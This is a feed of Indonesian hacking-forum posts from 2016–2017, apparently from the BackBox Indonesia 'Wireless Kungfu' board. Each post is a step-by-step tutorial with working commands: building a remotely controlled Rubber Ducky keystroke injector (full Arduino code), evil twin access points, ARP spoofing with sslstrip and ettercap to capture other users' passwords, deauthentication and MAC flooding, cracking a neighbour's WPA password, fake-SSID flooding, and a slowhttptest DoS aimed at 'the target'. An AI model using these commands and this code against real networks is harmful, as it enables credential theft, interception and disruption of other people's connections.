BackBox Indonesia - Wireless Kungfu

Wireless Rubber Ducky

Fri, 05 May 2017 02:55:21 +0000

WiFi Ducky

Untuk yang belum tau tentang USB Rubber Ducky, yaitu merupakan BadUSB tool yang dikomersilkan oleh HakShop. Bagi yang sering liat serial movie Mr Robot pasti pernah liat scene/adegan ini.

Beberapa waktu lalu ane bikin tutor cara buat BadUSB sendiri dengan Arduino Pro Micro (ATmega32U4) yang harganya jauh lebih murah dari USB Rubber Ducky. Bisa kalian coba lihat disini.

Kemudian setelah itu ane juga bikin WiFI Jammer dengan salah satu IoT Module, yaitu NodeMCU ESP8266. Kalian bisa liat juga disini.

Tapi belum lama setelah ane buat keduanya, muncul lagi rasa penasaran. Yaitu, bagaimana jika kedua device diatas disatukan? Tool apalagi yang bisa kita buat? Lalu beberapa saat setelah ngulik sana sini, akhirnya ane nemuin salah satu project di GitHub yang kurang lebih sejalur dengan rasa penasaran ane. Lanjot.

KONSEP

Jika pada Rubber Ducky biasa, kita perlu melakukan flashing tiap kali ingin merubah payload.

Dengan Wireless Rubber Ducky masalah itu kini teratasi. Cukup dengan tool ini yang tercolok ke target, akan tersedia Panel yang bisa diakses via internet browser. Kalian bisa melakukan LIVE ATTACK via Panel yang sudah tersedia dari jauh lewat smartphone/komputer kalian. Ada beberapa fitur menarik yang akan mempermudah penggunaan. Tak perlu flashing berkali - kali, cukup upload melalui panel kapanpun kalian mau.

ALAT & BAHAN

Sebelumnya kalian perlu punya :
1. Arduino Pro Micro (ATmega32U4).
2. ESP8266, bisa dibilang jenisnya lumayan banya, disini ane pake NodeMCU ESP8266.
3. Regulator 5V StepDown 3.3V AMS1117.
4. Kabel yang kecil banget, timah, solder, gunting, dan kopi serta sepiring pisang goreng hangat.

PEMBUATAN

Langsung yuk kita garap!

1. Soldering.
Kita perlu soldering dulu. Buat rangkaian seperti dibawah ini.

2. Flashing Arduino Pro Micro

Soldering kelar? Lanjut download & install dulu Arduino IDE. Kemudian konekin Arduino Pro Micro dengan kabel USB ke komputer. Buka Arduino IDE.

Klik tab Tool > Board > Pilih Arduino/Genuino Micro.

klik tab Tool > Port > Pilih Port milik Arduino Pro Micro yang benar, bisa dilihat di Device Manager kalo Windows.

Lalu kita flash dengan sketch dari :

https://gist.github.com/spacehuhn/b2b7d8...64fa7f4b36.

Nih sketch nya, copy aja di arduino ide, lalu klik Upload.

Code:
int program_pin = 12;

int enable_pin = 13;

void setup()

{

  Serial1.begin(115200);

  Serial.begin(115200);

  pinMode(enable_pin, OUTPUT);

  pinMode(program_pin, OUTPUT);

  digitalWrite(program_pin, LOW);

  digitalWrite(enable_pin,HIGH);

}

void loop()

{

  while(Serial1.available()){

    Serial.write((uint8_t)Serial1.read());

  }

  if(Serial.available()){

    while(Serial.available()){

      Serial1.write((uint8_t)Serial.read());

    }

  }

}

Tunggu sampai Upload done.

3. Flashing ESP8266
Cabut kabel USB, lalu colokin NodeMCU ESP8266 dengan kabel USB ke komputer. Sekarang giliran kita flash ESP8266 nya.
a. Download dulu tool flasher nya disini :
https://github.com/nodemcu/nodemcu-flasher/tree/master/Win32/Release (32bit)
https://github.com/nodemcu/nodemcu-flash...64/Release (64bit)
*sesuaikan dengan OS kalian.
b. Lalu download file .bin untuk ESP8266 nya disini :
https://github.com/spacehuhn/wifi_ducky/releases
Pilih versi v1.1 dan bernama esp8266_wifi_duck_4mb.bin
Jika udah didownload semua, buka ESP8266Flasher yang udah kalian download di poin (a) tadi.
- Pilih port milik nodemcu.
- Klik tab Config, klik tombol berlogo gerigi, kemudian pilih file esp8266_wifi_duck_4mb.bin yang udah kalian download di pin (b) tadi.
- Klik tab Advance, untuk Bautrate : 115200, Flash size : 4MByte, Flash speed : 80MHz, dan SPI Mode : DIO.
- Balik ke tab Operation, lalu klik Flash(F).
- Tunggu sampe kelar.

4. re-Flashing Arduino Pro Micro

Cabut kabel USB nya. Trus konekin ke Arduino Pro Micro dengan kabel USB ke komputer. Lu kira udah kelar ngeflash pro micro nya? Belom! Udah nancep? Sekarang buka Arduino IDE lagi dan pastiin Port dan Type Board udah kalian periksa dengan benar.

Trus kita pake sketch dari sini :

https://github.com/spacehuhn/wifi_ducky/..._wifi_duck

Atau copy aja sketch dibawah ini ke Arduino IDE trus klik Upload.

Code:
#include 

#define BAUD_RATE 57200

#define ExternSerial Serial1

String bufferStr = "";

String last = "";

int defaultDelay = 0;

void Line(String _line)

{

  int firstSpace = _line.indexOf(" ");

  if(firstSpace == -1) Press(_line);

  else if(_line.substring(0,firstSpace) == "STRING"){

    for(int i=firstSpace+1;i<_line.length();i++) Keyboard.write(_line[i]);

  }

  else if(_line.substring(0,firstSpace) == "DELAY"){

    int delaytime = _line.substring(firstSpace + 1).toInt();

    delay(delaytime);

  }

  else if(_line.substring(0,firstSpace) == "DEFAULTDELAY") defaultDelay = _line.substring(firstSpace + 1).toInt();

  else if(_line.substring(0,firstSpace) == "REM"){} //nothing :/

  else if(_line.substring(0,firstSpace) == "REPLAY") {

    int replaynum = _line.substring(firstSpace + 1).toInt();

    while(replaynum)

    {

      Line(last);

      --replaynum;

    }

  } else{

      String remain = _line;

      while(remain.length() > 0){

        int latest_space = remain.indexOf(" ");

        if (latest_space == -1){

          Press(remain);

          remain = "";

        }

        else{

          Press(remain.substring(0, latest_space));

          remain = remain.substring(latest_space + 1);

        }

        delay(5);

      }

  }

  Keyboard.releaseAll();

  delay(defaultDelay);

}

void Press(String b){

  if(b.length() == 1) Keyboard.press(char(b[0]));

  else if (b.equals("ENTER")) Keyboard.press(KEY_RETURN);

  else if (b.equals("CTRL")) Keyboard.press(KEY_LEFT_CTRL);

  else if (b.equals("SHIFT")) Keyboard.press(KEY_LEFT_SHIFT);

  else if (b.equals("ALT")) Keyboard.press(KEY_LEFT_ALT);

  else if (b.equals("GUI")) Keyboard.press(KEY_LEFT_GUI);

  else if (b.equals("UP") || b.equals("UPARROW")) Keyboard.press(KEY_UP_ARROW);

  else if (b.equals("DOWN") || b.equals("DOWNARROW")) Keyboard.press(KEY_DOWN_ARROW);

  else if (b.equals("LEFT") || b.equals("LEFTARROW")) Keyboard.press(KEY_LEFT_ARROW);

  else if (b.equals("RIGHT") || b.equals("RIGHTARROW")) Keyboard.press(KEY_RIGHT_ARROW);

  else if (b.equals("DELETE")) Keyboard.press(KEY_DELETE);

  else if (b.equals("PAGEUP")) Keyboard.press(KEY_PAGE_UP);

  else if (b.equals("PAGEDOWN")) Keyboard.press(KEY_PAGE_DOWN);

  else if (b.equals("HOME")) Keyboard.press(KEY_HOME);

  else if (b.equals("ESC")) Keyboard.press(KEY_ESC);

  else if (b.equals("INSERT")) Keyboard.press(KEY_INSERT);

  else if (b.equals("TAB")) Keyboard.press(KEY_TAB);

  else if (b.equals("END")) Keyboard.press(KEY_END);

  else if (b.equals("CAPSLOCK")) Keyboard.press(KEY_CAPS_LOCK);

  else if (b.equals("F1")) Keyboard.press(KEY_F1);

  else if (b.equals("F2")) Keyboard.press(KEY_F2);

  else if (b.equals("F3")) Keyboard.press(KEY_F3);

  else if (b.equals("F4")) Keyboard.press(KEY_F4);

  else if (b.equals("F5")) Keyboard.press(KEY_F5);

  else if (b.equals("F6")) Keyboard.press(KEY_F6);

  else if (b.equals("F7")) Keyboard.press(KEY_F7);

  else if (b.equals("F8")) Keyboard.press(KEY_F8);

  else if (b.equals("F9")) Keyboard.press(KEY_F9);

  else if (b.equals("F10")) Keyboard.press(KEY_F10);

  else if (b.equals("F11")) Keyboard.press(KEY_F11);

  else if (b.equals("F12")) Keyboard.press(KEY_F12);

  else if (b.equals("SPACE")) Keyboard.press(' ');

  //else Serial.println("not found :'"+b+"'("+String(b.length())+")");

}

void setup() {

  Serial.begin(BAUD_RATE);

  ExternSerial.begin(BAUD_RATE);

  pinMode(13,OUTPUT);

  digitalWrite(13,HIGH);

  Keyboard.begin();

}

void loop() {

  if(ExternSerial.available()) {

    bufferStr = ExternSerial.readStringUntil("END");

    Serial.println(bufferStr);

  }

  if(bufferStr.length() > 0){

    bufferStr.replace("\r","\n");

    bufferStr.replace("\n\n","\n");

    while(bufferStr.length() > 0){

      int latest_return = bufferStr.indexOf("\n");

      if(latest_return == -1){

        Serial.println("run: "+bufferStr);

        Line(bufferStr);

        bufferStr = "";

      } else{

        Serial.println("run: '"+bufferStr.substring(0, latest_return)+"'");

        Line(bufferStr.substring(0, latest_return));

        last=bufferStr.substring(0, latest_return);

        bufferStr = bufferStr.substring(latest_return + 1);

      }

    }

    bufferStr = "";

    ExternSerial.write(0x99);

    Serial.println("done");

  }

}

Tunggu upload nya selesai. Dan udah gitu aja.

Gimana cara penggunaanya?

1. Colokin Wireless Rubber Ducky ke komputer target.
2. Connect kan smartphone/komputer kalian ke SSID milik Wireless Rubber Ducky, yang bernama WiFi Duck. Password nya adalah quackquack.
3. Buka internet browser, baiknya pake Chrome. Masuk ke IP 192.168.4.1 milik Wireless Rubber Ducky.
4. Enjoy. Ane rasa dari sini kalian bisa explore sendiri.

*Kalian juga bisa menerapkan payload rubberducky dari Hak5, kalo males bikin payload sendiri.
Hak5 Official RubberDucky Script/Payload :
https://github.com/hak5darren/USB-Rubber...i/Payloads

Source :

https://github.com/spacehuhn/wifi_ducky

Jadi yah, sekian. Semoga bermanfaat. Terimakasih.

MAC Address Flooding

Thu, 19 May 2016 06:48:58 +0000

hehe, mumpung libur, mampir ramein ke sini dulu deh.
gak tau deh ini salah room kah ? dah deh lanjut tutor aja. :D

Mac Address flooding adalah suatu serangan yang mengirimkan paket apnormal sebanyak-banyaknya (flooding/dos) berdasarkan BSSID. salah satu tools yang sering digunakan para linuxer adalah macof.
untuk cara mengetahui mac target , silahkan search sendiri ya di guugle :#

lanjutt..

pertama kita akitifkan dulu airmon-ng

airmon-ng start eth0

kalau anda memakai jaringan wifi maka aktifkan yang wlan0 kalau pake LAN aktifkan yang eth0

utk bantuan pemakaian:

macof -h

nah itu udah ada bantuan mau kita jalankan seperti apa
sebagai contoh saya akan membanjiri macc address dengan timeout 200

macof -i eth0 -n 200 -d 54:E6:FC:D5:07:98

dari kesimpulan perintah tersebut kita akan flooding macc 54:E6:FC:D5:07:98 dan lama kelamaan akan dead itu mac.

Sekian tutor sederhana ini, semoga bermanfaat.
jika ada kesalahan mohon di benarkan di kolom komentar..
baca juga di blog ane: TKJ Cyber Art

SUMUR

EVIL TWIN ACCESS POINT OFFLINE MODE (ROUTER MU ROUTER Q JUGA :v)

Fri, 06 May 2016 15:30:04 +0000

maaf suhu saya ingin berbagi pengalaman membuat evil twin AP offline mode dengan metode phising redirection menggunakan dnsmasq..... untuk login.txt yang realtime dalam terminal saya menggunakan tail -f /lokasi/txt/yang/berada/di/var/www/html....

untuk konfigurasi iptables saya sudah membuat dalam bentuk bash.. dalam video saya mengetikan bash owl.sh... itu adalah file bash yang saya buat agar tidak ribet mengetik panjang lagi :v....

mohon kripik pedasnya

WaiFai Jahat the Beginning

Fri, 06 May 2016 04:25:36 +0000

Hola Linuxer sebangsa dan setanah air, perkenalkan ane Satria Wiguna. Awalnya ane berencana buat bikin ini tutorial jadi private alias kalo mau tau PM fb cuma mungkin karena ane orangnya males jadi akirnya ane mutusin buat bikin akun dimari dan mulai posting segala yang ane tau *ga banyak. Ok kalo mau kenalan bisa PM ntuh FB, kita langsung aja mulai

Legal Preparation(Hardware):

Laptop sendiri
Wifi + internet sendiri
USB wireless sendiri (ane pake TP-LINK 722N)

Software Preparation:

Linux (kali, BB, Parrot, Etc)
aircrack-ng dan keluarganya
dhcpd

How to?
0. Doa, beneran kalo lu ga doa ntar error dikit pasti bingung

ane asumsiin yang ngikutin tutorial ini udah punya 2 wireless card (dilaptop dan USB)
kita mulai dengan mengubah mode dari wireless USB ke monitor mode (terserah sih mau si USB ato bawaan laptop yang diubah, sesuaiin aje)
- #ifconfig wlanX down
- #iwconfig wlanX mode monitor
- #ifconfig wlanX up
- notes: X tergantung wireless yang mana mau lu pake wlan1? wlan0?
setelah masuk mode monitor maka wireless bisa dipake bikin soft access point
- #airbase-ng --essid "nama waifai yang mau lu pake"
nah jika airbase-ng udah jalan maka ada interface baru yang bisa dipake main namanya at0, tapi dia masi bobok jadi dibangunin terus dikasi ip address buat diajak main bareng
- #ifconfig at0 up
- #ifconfig at0 netmask
- example: ifconfig at0 192.168.69.1 netmask 255.255.255.0
nah abis at0 bangun dan lu kasi ip sekarang kita bikin rute untuk si at0
- #route add -net netmask gw
- example: route add -net 192.168.69.0 netmask 255.255.255.0 gw 192.168.69.1
kita sudahi merintah at0 dan move on buat ngurusi dhcp, menurut tutorial dan yang ane lakuin konfigurasi dhcp yang ane pake sebage berikut * harap kreatip dikit biar ngerti
- subnet 192.168.69.0 netmask 255.255.255.0 {range 192.168.69.10 192.168.69.50;option broadcast-address 192.168.69.255;option routers 192.168.69.1;default-lease-time 600;max-lease-time 7200;option domain-name "local";option domain-name-servers 8.8.8.8, 8.8.4.4;}
setelah konfig dhcp selesai kita kasi hadiah lagi ke at0 yaitu kemampuan untuk ngasi ip otomatis
- #dhcpd -cf /path/to/the/config.file at0
- example: dhcpd -cf /etc/dhcp/satriaganteng.conf at0
hurray segini aja udah hampir jadi soale waifainya udah bisa nerima client, tapi belum bisa ngasi internet, nah sekarang kita kasi hadiah terakhir buat si at0 yaitu internet
- #iptables -t nat -A POSTROUTING --out-interface -j MASQUERADE
- #iptables --append FORWARD --in-interface at0 -j ACCEPT
- #echo "1" > /proc/sys/net/ipv4/ip_forward
- notes: linux itu case sensitive jadi besar kecil huruf itu ngaruh * size does matter!
voila, dengan gitu kita udah bisa bikin wifi versi jahat, wait kenapa jahat? kita kan belum ngapa ngapain, baru juga belajar bikin. -- tenang, dalem kesempatan laen ane bakal bikin tutorial kenapa ini sangat menyenangkan (spoiler: kita bakal main sama hsts bypass dan sniffing)

Oke pertanyaan terakhir kenapa ga pake gambar? c'mon man ane males, ane cuma nyampein jadi intinnya kalo berhasil ga error kalo error berarti ada yang salah
Oh iya, 1 lagi kalo ada masukan dan pertanyaan bisa langsung PM fb ane buat fast response, i would love to answer your question and i wont judge your question, i promise.
stay calm and take care guys!

(ASK) bettercap dan ettercap dalam jaringan cisco

Mon, 02 May 2016 03:27:57 +0000

mau bertanya kepada master di sene....

saya mw mencoba memakai bettercap untuk injeksi proxy module (injectjs).. tetapi yang saya dapatkan hanyalah user yang masuk dan keluar secara langsung dan tidak mendapatkan hasil ouput browser mereka terinjeksi....

apakah ada solusinya master????

Melihat Username dan Password Pengguna Jaringan Wifi

Fri, 29 Apr 2016 04:13:18 +0000

awkkaw post dulu sebelum shalat jumat :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu

Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254

keterangan:
wlan0 : jenis interface yang digunakan
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit.
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak ;)

Kunjungin juga gengs TKJ Cyber Art

SUMUR

Cara Mematikan koneksi orang lain

Wed, 20 Apr 2016 13:47:32 +0000

Halo Teman-teman kali ini saya ingin membuat tutorial tentang mematikan koneksi orang lain menggunakan MDK3
Soal penginstalan mungkin sudah di bahas
oke langsung aja pertama kita buka terminalnya
dan ketikkan
- sudo su
setelah terbuka ketikkan perintah berikut
- airmon-ng start wlan0

setelah berhasil seperti ini

setelah berhasil kita ketik
-ifconfig wlan0
ntar bakal muncul mac

sorry kalau di sensor :D
kalau uda itunya di copy terus ketik di terminal
echo mac anda >> x.txt
nb:x.txt bisa di ganti sesuai keinginan

kalau sudah terus di eksekusi deh langsung
mdk3 mon0 d -w x.txt

kalau uda gitu cek cek lagi ke temen atau ke orang lain uda mati belum koneksinya kalau buat hotspot palsu juga bisa
caranya buat dlu listnya di file txt atau list ekstensinya
nahh ntar kalau uda tinggal mainin dah
mdk3 mon0 b -f list.txt

Sekian dari saya Salam anak Backbox dari Medan Good Luck !
Learn Is Fun :D

Sniffing jaringan dengan intercepter-ng

Sat, 16 Apr 2016 21:34:59 +0000

Kali ini ane mau share tentang snifing jaringan menggunakan intercepter-ng. Tools ini sama halnya dengan tools snifing yang lain seperti wireshark, dll
Kelebihan dari intercepter itu sendiri hanya memfilter paket yang penting" saja seperti post/get username. Kekurangan dari aplikasi ini yaitu tidak bisa snifing password web yang menggunakan https (ya iya lah).
Langsung saja tanpa basa basi lagi.

Cara penggunaan aplikasi ini cukup sederhana, pertama kita download dulu aplikasinya disini. kalo mau versi windows, mac, atau androidnya bisa di download di web resminya di http://sniff.su/. kebetulan aplikasi yang tadi kita download adalah hasil rebuild ane untuk installer backbox lalu kita install dengan perintah ini

Code:
root@backbox~# wget http://www.backboxindonesia.or.id/tmp/intercepter_1-2_all.deb

root@backbox~# dpkg -i intercepter_1-2_all.deb

Setelah intercepter terinstall kita coba ketikan di terminal seperti ini untuk melihat informasi

Code:
root@backbox~# intercepter -h

Penjelasan perintah yang ada di intercepter

Code:
mode:

   1: passwords

   2: passwords + files

   3: passwords + files, no arp poison

Contoh penggunaan : 

root@backbox~# intercepter 1 1 w

 1 = nomer interface

 1 = mode capture

 w = menyimpan ke dalam .pcap

root@backbox~# intercepter dump.pcap 2

 dump.pcap = file capture

 2 = mode capture

root@backbox~# intercepter 1 1 -gw 192.168.1.1 -t1 192.168.1.3 -t2 192.168.1.5

 1 = nomer interface

 1 = mode capture

 -gw = seting gateway

 -t1 = target pertama

 -t2 = target kedua

Biasanya ane suka pake aplikasi intercepter dengan perintah ini buat snifing jaringan

Code:
root@backbox~# intercepter 2 1

dan kita lihat hasilnya.

Binggow, itu hanya contoh saja. Selebihnya terserah anda.
Akhir kata, semoga ilmunya bermanfaat.

[ASK] Wpa Handshake

Wed, 06 Apr 2016 02:12:25 +0000

Bagaimana ya cara cepat agar mendapatkan wpa handshake ane udah melakukan deauthentication attack terhadap client agar si client berasosiasi dengan AP lagi tapi hasilnya nihil tidak ada wpa handshakenya.

Spoiler

mohon bantuannya gan :)

Hacking Wifi dengan Wifite+Aircrack

Thu, 24 Mar 2016 13:27:29 +0000

Assalamualaikum, mumpung ayas lagi ada koneksi, disini ayas mau ngeshare trik hack wifi dengan wifite+aircrack. trik ini dijamin lumayan ampuh

Ceritanya, wifi di mabes ane kan ganti pake mncplay. otomatis pass nya diganti, terpaksa wifite turun, cek this out how to use wifite+aircrack.
langkah pertama nya yaitu kita jalanin si wifite nya.

Code:
sudo wifite

atau kalo sudah root, bisa langsung

Code:
wifite

nahh nanti kaya begini nihh~

si wifite akan otomatis meng-enable-kan mode monitor pada wlan kita. karna biasanya kalo mau scan-scan wipi itu pake mon0
setelah itu, wifite akan menampilkan wifi-wifi yang sinyal nya sampe ke pangkuan kita~

disitu bisa diliat kan, ada 3 wifi disekitaran ane. dan informasi nya yang dikasih si wifite itu lengkap banget. dari mulai channel nya, enkripsi nya pake WPA2 ato WEP terus ada client nya apa ngga.. pokoknya wuenakk dah
langsung aja, kalo misalkan udah ngga ada lagi wifi yang ke-scan, kita pencet Ctrl+C buat menghentikan scanning, dan berlanjut ke tahap selanjut nya. jadi ga langsung berenti gitu aja walopun di Ctrl+C.
nanti seperti ini langkah selanjutnya, kita akan pilih target wifi nya~

karna ane mau hek wifi yang pertama (Wifi-Tetangga), yaudah ane pilih 1, lalu enter.
setelah itu si wifite langsung mem-bruteforce si wifi, biasa nya lama banget disini. bisa kita skip dengan Ctrl+C lagi.

abis di skip, kita masuk ke tahap capture handshake
biasa nya agak lama, karna kalo kita mau nge-capture handshake tahap-tahap nya yaitu, kita putusin dulu si client denga si wifi
lalu, pasti si client kan konak kembali dengan si wifi.. baru dahh bisa ke capture itu handshake nya~

jadi kita tunggu aja, sampe si client itu konak kembali dengan si wifi.
nanti kalo udahh, akan jadi seperti ini

kita sudah berhasil meng-capture handshake dari client yang konek ke Wifi-Tetangga
capture nya disimpan di folder hs/nama-handshake-nya.cap
nahh baru deh disini kita butuh bantuan si Aircrack buat nge-crack si handshake nya itu, cara nya~

Code:
sudo aircrack-ng nama-handshake-nya.cap -w wordlist-kita

biasa nya tahap ini lumayan luamaaa~ tergantung isi dari wordlist kita.
sedikit tips buat nyusun wordlist nya, kita harus information gathering si yang punya wifi. misalnya kita harus tau nama anaknya, anjing piaraan nya, istri nya, istri ke-2 nya, istri ke-3 nya.. sampe istri ke-n wkwkk. karna semakin banyak, semakin bagus isi dari wordlist kita.
lalu kita tunggu si aircrack beraksii

ditinggalin ngopi dulu juga gapapa~ asal jangan ditinggalin mantan aja
*1 jam kemudian..

horeee setelah menunggu lama, kita dapat crack-an password nyaa!!

Sekian dan Terima Gaji :D

Wordlist for wpa wpa2

Thu, 24 Mar 2016 12:30:21 +0000

WELCOME
Punten akang2 dan teteh2 disini, ayas mau ngeshare wordlist buat bruteforce wpa wpa2, maap ayas gabisa ngetik banyak2 hehe. silahkan sedot aja :)

Wordlist 1
Wordlist 2
Wordlist 3
Wordlist 4
Wordlist 5
Wordlist 6
Wordlist 7
Wordlist 8
Wordlist 9

Sumber Klik Here

Membuat ribuan Hotspot palsu untuk mengacaukan Wifi

Wed, 23 Mar 2016 12:25:01 +0000

WELCOME
Oke kali ini saya akan membahas bagaimana membuat ssid dalam 1 hardware menjadi banyak,lebih tepatnya bisa untuk membuat nama wifi lebih dari 1, Trik ini digunakan untuk mengacaukan wifi alias ngejahili pengguna wifi wkwkw, disini alat2 yang perlu di persiapkan adalah OS Linux (Saya Mengunakan Backbox 4.5 dan MDK3 yang sudah terinstall)
langsung saja,mode monitor harus aktif.
Buatlah list,disini saya sudah membuat list dengan nama ssid.list dan simpan pada folder root.

dan setelah membuat ssid.list, buka terminal Backbox anda lalu masukkan perintah nya,seperti dibawah ini.

yee berhasil,dan testing menggunakan perangkat lain.
hasilnya seperti ini

NB: Jika ada yang mengalami error kaya gini

root@1337:/home/hightech# mdk3 mon0 b -f ssid.list
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device

pastekan di terminal anda "sudo iw phy phy0 interface add mon0 type monitor" (tanpa tanda kutip)

DDoS Attack Menggunakan Slowhttptest di Backbox Linux

Sat, 12 Mar 2016 03:03:41 +0000

Introduce myself mynick name Mr.Rules, ane new member dan ini new post ane semoga cepet akrab sama kalian :)
post ini ane mau share tools yang ada di backbox linux yaitu stress testing DDoS Attack Menggunakan Slowhttptest di Backbox Linux mungkin bisa juga di kali, parrot dkk tinggal install sudo apt-get install slowhttptest

oke langsung saja Buka slowhttptest di auditing ~> stress testing ~> DoS ~> Slowhttptest
Lanjut masukan command berikut :

Code:
slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.google.com -p 3

NOTE : ganti http://www.google.com dengan target yang akan di serang
untuk melihat fungsinya silahkan baca deskripsi.
Lalu Enter maka akan terlihat seperti gambar di bawah ini :

untuk melihat trafic jaringannya silahkan install etherape

Code:
sudo apt-get install etherape

maka akan terlihat seperti gambar di bawah ini :

sampai disini DDoS Attack telah berhasil di jalankan.
oke sekian postingan kali ini gunakan dengan bijak ini hanya pembelajaran semata